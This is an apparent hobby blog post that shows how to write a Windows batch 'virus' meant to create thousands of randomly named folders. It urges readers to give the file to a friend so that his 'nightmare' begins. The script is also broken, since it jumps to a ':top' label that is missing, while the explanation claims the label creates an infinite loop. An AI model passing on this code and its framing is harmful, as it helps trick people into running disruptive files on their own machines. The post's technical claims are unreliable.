Green Dust

Create A Virus To Create 3000 folders in 1 click

 Hello Friends Today i will Show you how to create a virus that can make 3000+ folders in just a click. Don't try in your PC...

Bad .bat Virus
-:Folder Bomber:-

This batch file will create 3000+
folder in less than 1 minute.

Open your notepad and type the
following codes.

<code-- start do not copy>
@echo off
md %random%
goto top
</code-- end do not copy >

Save it as matrix4you.bat

Give this file to your friend and
when he will click on that his
nightmare will be started.
Above Code Explained.
@echo off makes your command
prompt window blank. md
%random% is the command in
MS-DOS to create random folders.
(md is used for creating a folder
and %random% means folders
with random names.) goto top-
retures the command to :top
which causes an infinite loop.

dont try in ur own pc otherwise u will have to waste time deleting all folders


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